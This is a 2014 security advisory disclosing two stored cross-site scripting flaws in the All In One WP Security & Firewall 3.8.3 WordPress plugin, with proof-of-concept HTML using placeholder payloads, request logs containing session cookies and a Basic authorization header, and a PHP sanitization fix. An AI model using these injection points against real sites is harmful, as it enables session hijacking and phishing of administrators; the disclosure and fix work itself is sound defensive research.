Document Title:
===============
All In One Wordpress Firewall 3.8.3 - Persistent Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1325


Release Date:
=============
2014-09-29


Vulnerability Laboratory ID (VL-ID):
====================================
1327


Common Vulnerability Scoring System:
====================================
3.3


Product & Service Introduction:
===============================
WordPress itself is a very secure platform. However, it helps to add some extra security and firewall to your site by using a
security plugin that enforces a lot of good security practices. The All In One WordPress Security plugin will take your website
security to a whole new level. This plugin is designed and written by experts and is easy to use and understand. It reduces
security risk by checking for vulnerabilities, and by implementing and enforcing the latest recommended WordPress security
practices and techniques.

(Copy of the Vendor Homepage: https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered two persistent vulnerabilities in the official All in One Security & Firewall v3.8.3 Wordpress Plugin.


Vulnerability Disclosure Timeline:
==================================
2014-09-29: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Github
Product: All In One Security & Firewall - Wordpress Plugin 3.8.3


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
Two persistent POST inject web vulnerabilities have been discovered in the official All in One WP Security and Firewall v3.8.3 plugin.
The vulnerabilities allow remote attackers to inject their own script code on the application side of the vulnerable service.

The first vulnerability is located in the 404 detection redirect URL input field of the firewall 404 detection application module.
Remote attackers are able to prepare malicious requests that inject their own script code on the application side of the vulnerable service.
The request method used to inject is POST, and the attack vector exploits the issue on the application side (persistent).
The attacker injects script code into the 404 detection redirect URL input field; the code executes in the same section,
next to the input field context, when the stored value is displayed again.

The second vulnerability is located in the file name error logs URL input field of the FileSystem Components > Host System Logs module.
Remote attackers are able to prepare malicious requests that inject their own script code on the application side of the vulnerable service.
The request method used to inject is POST, and the attack vector exploits the issue on the application side (persistent).
The attacker injects script code into the file name error logs URL input field; the code executes in the same section,
next to the input field context, when the stored value is displayed again.

The security risk of the persistent POST inject vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.2.
Exploitation of the application-side web vulnerability requires no privileged web-application user account but low or medium user interaction.
Successful exploitation of the vulnerability results in persistent phishing attacks, session hijacking, persistent external redirect to malicious
sources and application-side manipulation of affected or connected module context.


Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Firewall - Detection 404
[+] FileSystem Components > Host System

Vulnerable Parameter(s):
[+] 404 detection redirect url
[+] file name error logs url

Affected Module(s):
[+] Firewall - Detection 404
[+] FileSystem Components > Host System


Proof of Concept (PoC):
=======================
1.1
The first POST inject web vulnerability can be exploited by remote attackers without a privileged application user account and with low or
medium user interaction. For security demonstration or to reproduce the security vulnerability, follow the provided information and
steps below.

PoC: Exploit (Firewall > Detection 404 > [404 Lockout Redirect URL] )

<tr valign="top">
<th scope="row">404 Lockout Redirect URL:</th>
<td><input size="50" name="aiowps_404_lock_redirect_url" value="http://127.0.0.1\"
type="text"><\"<img src="\"x\"">%20%20>\"<%5C%22x%5C%22[PERSISTENT INJECTED SCRIPT CODE VIA 404 Lockout Redirect URL INPUT!]>" />
<span class="description">A blocked visitor will be automatically redirected to this URL.</span>
</td>
</tr>
</table>
<input type="submit" name="aiowps_save_404_detect_options" value="Save Settings" class="button-primary" />

</form>
</div></div>
<div class="postbox">
<h3><label for="title">404 Event Logs</label></h3>
<div class="inside">
<form id="tables-filter" method="post">
<!-- For plugins, we also need to ensure that the form posts back to our current page -->
<input type="hidden" name="page" value="aiowpsec_firewall" />
<input type="hidden" name="tab" value="tab6" /> <!-- Now we can render the completed list table -->
<input type="hidden" id="_wpnonce" name="_wpnonce" value="054474276c" /><input type="hidden" name="_wp_http_referer"
value="/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6" /> <div class="tablenav top">

<div class="alignleft actions">
<select name='action'>
<option value='-1' selected='selected'>Bulk Actions</option>
<option value='delete'>Delete</option>
</select>
<input type="submit" name="" id="doaction" class="button action" value="Apply" onClick="return confirm("Are you sure you want to perform this bulk operation on the selected entries?")" />
</div>
<div class='tablenav-pages no-pages'><span class="displaying-num">0 items</span>
<span class='pagination-links'><a class='first-page disabled' title='Go to the first page' href='http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6'>«</a>
<a class='prev-page disabled' title='Go to the previous page' href='http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6&paged=1'>‹</a>
<span class="paging-input"><input class='current-page' title='Current page' type='text' name='paged' value='1' size='1' /> of <span class='total-pages'>0</span></span>
<a class='next-page' title='Go to the next page' href='http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6&paged=0'>›</a>
<a class='last-page' title='Go to the last page' href='http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6&paged=0'>»</a></span></div>
<br class="clear" />
</div>


--- PoC Session Logs [POST] (Firewall > 404 Detection) ---
Status: 200[OK]
POST http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6 Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[8095] Mime Type[text/html]
Request Header:
Host[www.vulnerability-db.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall]
Cookie[wordpress_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C60421eb1c23917aaee2fcb45ab9f3398; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C7db4030c5de3be6fcc424f35c591e74b; wp-settings-1=m5%3Do%26m9%3Dc%26m6%3Dc%26m4%3Dc%26m3%3Dc%26m2%3Dc%26m1%3Do%26editor%3Dtinymce%26m7%3Dc%26m0%3Dc%26hidetb%3D1%26uploader%3D1%26m8%3Dc%26mfold%3Do%26libraryContent%3Dupload%26ed_size%3D393%26wplink%3D1; wp-settings-time-1=1411750846]
Authorization[Basic a2V5Z2VuNDQ3OjMyNTg1MjMyNTIzNS4yMTItNTg=]
Connection[keep-alive]
Response Header:
Server[nginx]
Date[Fri, 26 Sep 2014 17:40:21 GMT]
Content-Type[text/html; charset=UTF-8]
Content-Length[8095]
Connection[keep-alive]
Expires[Wed, 11 Jan 1984 05:00:00 GMT]
Cache-Control[no-cache, must-revalidate, max-age=0]
Pragma[no-cache]
X-Frame-Options[SAMEORIGIN]
X-Powered-By[PleskLin]
Vary[Accept-Encoding]
Content-Encoding[gzip]

-
Status: 200[OK]
GET http://www.vulnerability-db.com/dev/wp-admin/%5C%22x%5C%22[PERSISTENT INJECTED SCRIPT CODE VIA 404 Lockout Redirect URL INPUT!] Load Flags[LOAD_NORMAL] Größe des Inhalts[557] Mime Type[text/html]
Request Header:
Host[www.vulnerability-db.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6]
Cookie[wordpress_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C60421eb1c23917aaee2fcb45ab9f3398; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C7db4030c5de3be6fcc424f35c591e74b; wp-settings-1=m5%3Do%26m9%3Dc%26m6%3Dc%26m4%3Dc%26m3%3Dc%26m2%3Dc%26m1%3Do%26editor%3Dtinymce%26m7%3Dc%26m0%3Dc%26hidetb%3D1%26uploader%3D1%26m8%3Dc%26mfold%3Do%26libraryContent%3Dupload%26ed_size%3D393%26wplink%3D1; wp-settings-time-1=1411750846]
Authorization[Basic a2V5Z2VuNDQ3OjMyNTg1MjMyNTIzNS4yMTItNTg=]
Connection[keep-alive]
Response Header:
Server[nginx]
Date[Fri, 26 Sep 2014 17:40:22 GMT]
Content-Type[text/html]
Content-Length[557]
Connection[keep-alive]
Last-Modified[Tue, 14 May 2013 13:05:17 GMT]
Etag["4ea065b-3c6-4dcad48e5901e"]
Accept-Ranges[bytes]
Vary[Accept-Encoding]
Content-Encoding[gzip]
X-Powered-By[PleskLin]




Reference(s):
/wp-admin/admin.php?page=aiowpsec_firewall
/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6
/wp-admin/%5C%22x%5C%22[PERSISTENT INJECTED SCRIPT CODE VIA 404 Lockout Redirect URL INPUT!]
/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6&paged=0




1.2
The second POST inject web vulnerability can be exploited by remote attackers without a privileged application user account and with low or medium
user interaction. For security demonstration or to reproduce the security vulnerability, follow the provided information and steps below.

PoC: FileSystem Components > Host System Logs

<div class="inside">
<p>Please click the button below to view the latest system logs:</p>
<form action="" method="POST">
<input id="_wpnonce" name="_wpnonce" value="92d4aba49c" type="hidden">
<input name="_wp_http_referer" value="/dev/wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4" type="hidden">
<div>Enter System Log File Name:
<input size="25" name="aiowps_system_log_file" value="error_log>\\>\"[PERSISTENT INJECTED SCRIPT CODE!] type="text">" />
<span class="description">Enter your system log file name. (Defaults to error_log)</span>
</div>
<div class="aio_spacer_15"></div>
<input name="aiowps_search_error_files" value="View Latest System Logs" class="button-primary search-error-files" type="submit">
<span style="display: none;" class="aiowps_loading_1">
<img src="http://www.vulnerability-db.com/dev/wp-content/plugins/all-in-one-wp-security-and-firewall/images/loading.gif" alt="">
</span>
</form>
</div>


--- PoC Session Logs [POST] ---
Status: 200[OK]
POST http://www.vulnerability-db.com/dev/wp-admin/admin-ajax.php Load Flags[LOAD_BYPASS_CACHE LOAD_BACKGROUND ] Größe des Inhalts[-1] Mime Type[application/json]
Request Header:
Host[www.vulnerability-db.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[application/json, text/javascript, */*; q=0.01]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
X-Requested-With[XMLHttpRequest]
Referer[http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4]
Content-Length[109]
Cookie[wordpress_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C60421eb1c23917aaee2fcb45ab9f3398; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C7db4030c5de3be6fcc424f35c591e74b; wp-settings-1=m5%3Do%26m9%3Dc%26m6%3Dc%26m4%3Dc%26m3%3Dc%26m2%3Dc%26m1%3Do%26editor%3Dtinymce%26m7%3Dc%26m0%3Dc%26hidetb%3D1%26uploader%3D1%26m8%3Dc%26mfold%3Do%26libraryContent%3Dupload%26ed_size%3D393%26wplink%3D1; wp-settings-time-1=1411750846]
Authorization[Basic a2V5Z2VuNDQ3OjMyNTg1MjMyNTIzNS4yMTItNTg=]
Connection[keep-alive]
Pragma[no-cache]
Cache-Control[no-cache]
POST-Daten:
interval[60]
_nonce[176fea481c]
action[heartbeat]
screen_id[wp-security_page_aiowpsec_filesystem]
has_focus[false]
Response Header:
Server[nginx]
Date[Fri, 26 Sep 2014 17:53:44 GMT]
Content-Type[application/json; charset=UTF-8]
Transfer-Encoding[chunked]
Connection[keep-alive]
X-Robots-Tag[noindex]
x-content-type-options[nosniff]
Expires[Wed, 11 Jan 1984 05:00:00 GMT]
Cache-Control[no-cache, must-revalidate, max-age=0]
Pragma[no-cache]
X-Frame-Options[SAMEORIGIN]
X-Powered-By[PleskLin]




Status: 200[OK]
GET http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4 Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[6136] Mime Type[text/html]
Request Header:
Host[www.vulnerability-db.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4]
Cookie[wordpress_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C60421eb1c23917aaee2fcb45ab9f3398; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C7db4030c5de3be6fcc424f35c591e74b; wp-settings-1=m5%3Do%26m9%3Dc%26m6%3Dc%26m4%3Dc%26m3%3Dc%26m2%3Dc%26m1%3Do%26editor%3Dtinymce%26m7%3Dc%26m0%3Dc%26hidetb%3D1%26uploader%3D1%26m8%3Dc%26mfold%3Do%26libraryContent%3Dupload%26ed_size%3D393%26wplink%3D1; wp-settings-time-1=1411750846]
Authorization[Basic a2V5Z2VuNDQ3OjMyNTg1MjMyNTIzNS4yMTItNTg=]
Connection[keep-alive]
Response Header:
Server[nginx]
Date[Fri, 26 Sep 2014 17:53:54 GMT]
Content-Type[text/html; charset=UTF-8]
Content-Length[6136]
Connection[keep-alive]
Expires[Wed, 11 Jan 1984 05:00:00 GMT]
Cache-Control[no-cache, must-revalidate, max-age=0]
Pragma[no-cache]
X-Frame-Options[SAMEORIGIN]
X-Powered-By[PleskLin]
Vary[Accept-Encoding]
Content-Encoding[gzip]




Reference(s):
/wp-admin/admin-ajax.php
/wp-admin/admin.php?page=aiowpsec_filesystem
/wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4
/wp-content/plugins/all-in-one-wp-security-and-firewall/
/wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4


Solution - Fix & Patch:
=======================
The log file name issue can be patched by securely parsing and validating the Enter System Log File Name input in the file system security module.
The redirect URL issue can be patched by securely encoding and parsing the 404 Lockout Redirect URL input in the firewall 404 detection module.
Restrict the input and handle malicious context with its own secure exception handling to prevent further POST injection attacks.


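As an added example, not code from the plugin or from the advisory author, the following sketch shows the two fixes above in WordPress PHP: each value is sanitized when the settings form is saved and escaped again when the field is rendered, so a stored value can no longer break out of the value attribute as in the PoC. The form field names are the ones from the PoC; the option names, nonce actions and example_ helper names are assumed.

```php
<?php
// Added example, not the plugin's own code. Field names come from the PoC
// forms above; option names, nonce actions and helper names are assumed.

// Save handler for the 404 detection settings form.
function example_save_404_settings() {
    // Settings are admin-only: check capability and the form nonce first.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    check_admin_referer( 'example_404_settings' );

    $raw = isset( $_POST['aiowps_404_lock_redirect_url'] )
        ? wp_unslash( $_POST['aiowps_404_lock_redirect_url'] ) : '';

    // esc_url_raw() allows only the listed protocols and strips characters
    // that cannot occur in a URL (quotes, backslashes, angle brackets), so
    // the quotes and tags of the PoC payload never reach the database.
    $url = esc_url_raw( $raw, array( 'http', 'https' ) );
    if ( '' !== $raw && '' === $url ) {
        // Reject rather than silently store an unusable value.
        add_settings_error( 'aiowps_404_lock_redirect_url', 'invalid-url',
            'The 404 lockout redirect URL must be a valid http(s) URL.' );
        return;
    }
    update_option( 'example_404_lock_redirect_url', $url );
}

// Save handler for the "Enter System Log File Name" field.
function example_save_log_file_name() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    check_admin_referer( 'example_log_file_name' );

    $raw = isset( $_POST['aiowps_system_log_file'] )
        ? wp_unslash( $_POST['aiowps_system_log_file'] ) : 'error_log';
    // sanitize_file_name() drops quotes, angle brackets, slashes and other
    // characters unsafe in a file name; basename() blocks any traversal left.
    $name = basename( sanitize_file_name( $raw ) );
    update_option( 'example_system_log_file', '' === $name ? 'error_log' : $name );
}

// Render both fields. Escaping on output is the second layer: even a bad
// value that reaches the database stays inside the attribute.
function example_render_fields() {
    $url  = get_option( 'example_404_lock_redirect_url', '' );
    $name = get_option( 'example_system_log_file', 'error_log' );
    ?>
    <input size="50" type="text" name="aiowps_404_lock_redirect_url"
           value="<?php echo esc_url( $url ); ?>" />
    <input size="25" type="text" name="aiowps_system_log_file"
           value="<?php echo esc_attr( $name ); ?>" />
    <?php
}
```

The capability and nonce checks are included because both PoC requests are submitted from an authenticated wp-admin session; sanitizing on save and escaping on output are the two layers that close the persistent injection itself.

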
Security Risk:
==============
The security risk of the POST inject web vulnerabilities in the firewall module is estimated as medium.


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: dev.vulnerability-db.com - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

Copyright © 2014 | Vulnerability Laboratory [Evolution Security]


--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com